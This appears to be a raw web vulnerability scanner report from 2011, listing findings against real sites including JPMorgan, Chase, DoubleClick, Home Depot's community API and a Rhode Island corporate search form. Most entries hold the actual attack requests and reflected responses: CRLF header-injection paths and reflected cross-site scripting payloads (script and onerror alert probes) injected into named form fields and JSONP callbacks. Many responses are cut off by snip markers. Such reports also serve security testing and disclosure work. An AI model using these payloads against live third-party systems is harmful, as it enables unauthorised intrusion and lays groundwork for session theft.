Confidence: | Tentative |
Host: | http://www.jpmorgan.com |
Path: | /tss/General/ACH_Fraud |
GET /tss/General/ACH_Fraud Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT Date: Tue, 12 Jul 2011 15:33:52 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS155.180.188 Set-Cookie: JpmcSession=ZWHvTcpQ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 104714 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html <META name="jpmc_lob" content="Treasury Services"> <TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE> <META NAME="robots" CONTENT="INDEX,FOLLOW"/> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <l ...[SNIP]... |
GET /tss/General/ACH_Fraud Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:56:00 GMT Date: Tue, 12 Jul 2011 15:33:57 GMT Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS188.20 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 104714 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html <META name="jpmc_lob" content="Treasury Services"> <TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE> <META NAME="robots" CONTENT="INDEX,FOLLOW"/> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.jpmorgan.com |
Path: | /tss/Product_A-Z/Products |
GET /tss/Product_A-Z/Products Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT Date: Tue, 12 Jul 2011 15:33:40 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS155.180.188 Set-Cookie: JpmcSession=CyQnTcpJ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 106611 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html <META name="jpmc_lob" content="Treasury Services"> <TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE> <META NAME="robots" CONTENT="INDEX,FOLLOW"/> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM ...[SNIP]... |
GET /tss/Product_A-Z/Products Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ARPT=NKOJWQS188.20 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT Date: Tue, 12 Jul 2011 15:33:43 GMT Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: ARPT=NKOJWQS188.20 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 106611 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html <META name="jpmc_lob" content="Treasury Services"> <TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE> <META NAME="robots" CONTENT="INDEX,FOLLOW"/> <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM <link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /getcamphist |
GET /8ca46%0d%0aae875a6483a;src=1513429;host=metrics Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8ca46 ae875a6483a;src=1513429;host=metrics Date: Tue, 12 Jul 2011 17:59:33 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /getcamphist |
GET /getcamphist;src=1513429 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://metrics.apple.com 1d25cb0b3ad&A2S=1/respcamphist;src Date: Tue, 12 Jul 2011 17:59:32 GMT Server: GFE/2.0 Content-Type: text/html |
Severity: | High |
Confidence: | Certain |
Host: | https://locator.chase.com |
Path: | /LocatorAction.do |
GET /22ef1%0d%0a7769e8f9510;jsessionid=C68735D6 Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 301 Moved Permanently Date: Tue, 12 Jul 2011 16:09:43 GMT Server: Apache P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Location: /22ef1 7769e8f9510;jsessionid=C68735D6 Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain |
Severity: | High |
Confidence: | Certain |
Host: | https://locator.chase.com |
Path: | /favicon.ico |
GET /7b17c%0d%0ac7e1c72fd84 HTTP/1.1 Host: locator.chase.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 301 Moved Permanently Date: Tue, 12 Jul 2011 16:09:52 GMT Server: Apache Set-Cookie: JSESSIONID=3E400342F P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Location: /7b17c c7e1c72fd84;jsessionid=3E400342 Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain |
Severity: | High |
Confidence: | Certain |
Host: | https://locator.chase.com |
Path: | /jsp/SearchPage.jsp |
GET /64242%0d%0a98bbc6ba98b/SearchPage.jsp HTTP/1.1 Host: locator.chase.com Connection: keep-alive Referer: https://locator.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 301 Moved Permanently Date: Tue, 12 Jul 2011 16:10:31 GMT Server: Apache Set-Cookie: JSESSIONID=BD669E70F Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Location: /64242 98bbc6ba98b/SearchPage.jsp Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain |
Severity: | High |
Confidence: | Firm |
Host: | https://access.jpmorgan |
Path: | /appmanager/jpmalogo |
GET /appmanager/jpmalogo Host: access.jpmorgan.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 404 Not Found Date: Tue, 12 Jul 2011 16:31:12 GMT Server: Apache Content-Length: 96 Keep-Alive: timeout=5, max=200 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Resource /jpmalogonportal1ad44(a)706815c84f/jpmalogonhome could not be resolved for locale null. |
Severity: | High |
Confidence: | Firm |
Host: | https://access.jpmorgan |
Path: | /appmanager/jpmalogo |
GET /appmanager/jpmalogo Host: access.jpmorgan.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 404 Not Found Date: Tue, 12 Jul 2011 16:31:18 GMT Server: Apache Content-Length: 97 Keep-Alive: timeout=5, max=200 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Resource /jpmalogonportal |
Severity: | High |
Confidence: | Firm |
Host: | https://access.jpmorgan |
Path: | /appmanager/jpmalogo |
GET /appmanager/jpmalogo Host: access.jpmorgan.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:31:00 GMT Server: Apache Cache-Control: no-cache="set-cookie" Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TARGET_URL=https:/ Keep-Alive: timeout=5, max=200 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 34403 <html> <head> <title>J.P. Morgan ACCESS</title><link rel="stylesheet" href="/framework/skins ...[SNIP]... <input type="hidden" name="target" value="https://tssportal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://community |
Path: | /restapi/vc/boards/id |
GET /restapi/vc/boards/id Host: community.homedepot.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26FCF442 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:34:35 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Content-Length: 653 Connection: close Content-Type: application/json;charset jsonp1310488529624e6afc<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://community |
Path: | /restapi/vc/boards/id |
GET /restapi/vc/boards/id Host: community.homedepot.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26FCF442 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:34:34 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Content-Length: 600 Connection: close Content-Type: application/json;charset jsonp13104885296198d1a9<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://community |
Path: | /restapi/vc/boards/id |
GET /restapi/vc/boards/id Host: community.homedepot.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26FCF442 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:34:34 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Content-Length: 637 Connection: close Content-Type: application/json;charset jsonp13104885296211e87e<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://community |
Path: | /restapi/vc/boards/id |
GET /restapi/vc/boards/id Host: community.homedepot.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26FCF442 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:34:34 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Content-Length: 608 Connection: close Content-Type: application/json;charset jsonp1310488529617f5c71<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://sales.liveperson |
Path: | /visitor/addons/deploy |
GET /visitor/addons/deploy Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.homedepot.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LivePersonID=LP i=16101514677756,d |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 16:36:14 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT Content-Length: 2141 Content-Type: application/x-javascript Set-Cookie: ASPSESSIONIDQSATCQQT Cache-control: public, max-age=3600, s-maxage=3600 //Plugins for site 57386690ad89c a7074f0f5d5 lpAddMonitorTag(); typeof lpMTagConfig!="undefined" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y4392f"><script>alert(1)< ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=ActiveFlagCrit value="Y4392f"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=Address value="843a1"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8554 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=AgentName value="7e6fa"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8592 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <u>xssdbe0c<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8543 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=SearchMethod value="Be6e30"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=FirstName value="7350f"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=LastName value="9e9bf"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=MiddleName value="8668e"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:49:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 8555 Content-Type: text/html Cache-control: private <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospac ...[SNIP]... <input type=hidden name=Purpose value="3d359"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /CorpSearch/CorpSear |
